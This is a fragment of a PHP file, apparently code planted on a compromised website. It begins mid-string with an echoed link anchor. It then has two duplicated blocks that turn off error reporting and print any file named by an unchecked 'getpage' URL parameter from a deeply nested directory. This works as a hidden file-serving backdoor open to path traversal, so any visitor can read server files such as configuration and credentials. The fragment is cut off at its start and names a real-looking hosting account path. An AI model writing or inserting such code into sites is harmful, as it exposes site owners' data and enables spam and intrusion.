'.$anchor.'
'.PHP_EOL;
}
@error_reporting(0);
@header ('Content-type: text/html; charset=utf-8');
if (isset($_GET["getpage"])) {
if (empty($_GET["getpage"])) $_GET["getpage"] = "index.html";
echo @file_get_contents("/home/marianalubrano/zazagroup.com/test_propiedades/buscador_cortes/buscador_cortes/buscador_cortes/buscador_cortes/".$_GET["getpage"]);
exit;
}
@error_reporting(0);
if (isset($_GET["getpage"])) {
if (empty($_GET["getpage"])) $_GET["getpage"] = "index.html";
echo @file_get_contents("/home/marianalubrano/zazagroup.com/test_propiedades/buscador_cortes/buscador_cortes/buscador_cortes/".$_GET["getpage"]);
exit;
}
?>